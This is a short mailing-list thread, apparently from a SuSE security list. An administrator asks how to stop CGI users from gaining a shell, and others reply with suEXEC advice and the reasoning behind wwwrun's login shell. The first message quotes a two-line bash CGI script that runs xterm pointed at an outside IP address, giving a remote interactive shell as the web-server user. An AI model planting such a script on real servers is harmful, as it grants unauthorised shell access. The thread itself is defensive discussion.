Hallo, When a user that has cgi-Access writes a cgi that looks like this: --------------schnipp-------------- #!/bin/bash # xterm -display 123.45.67.89 --------------schnapp-------------- ... (and inserts his own IP of course) he gets an xterm on his screen running as wwwrun. So what can I do about this? One good thing would be chrooting the cgi-environment. How can this be done? Are there howtos or manuals about this? Another thing is: Why is wwwrun having /bin/bash as shell and not /bin/false? What does it need a shell for? Ciao, Gerhard
Hallo Gerhard, hi all,
So what can I do about this? One good thing would be chrooting the cgi-environment. How can this be done? Are there howtos or manuals about this? See http://www.apache.org/docs/suexec.html Note that the SUexec is not installed per default, id est you have to re-compile apache your self.
Regards, Tobias
Salut,
Another thing is: Why is wwwrun having /bin/bash as shell and not /bin/false? What does it need a shell for?
There were some internal discussions about that issue. The result: We don't change non-human account's login shell to /bin/false, because it could result in some trouble with applications, which need a login shell to succesfully perform a 'su' etc.. Bye, Thomas -- Thomas Biege, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg E@mail: thomas@suse.de Function: Security Support & Auditing "lynx -source http://www.suse.de/~thomas/thomas.pgp | pgp -fka" Key fingerprint = 09 48 F2 FD 81 F7 E7 98 6D C7 36 F1 96 6A 12 47
participants (3)
-
Gerhard Pfeiffer -
Thomas Biege -
Tobias Burnus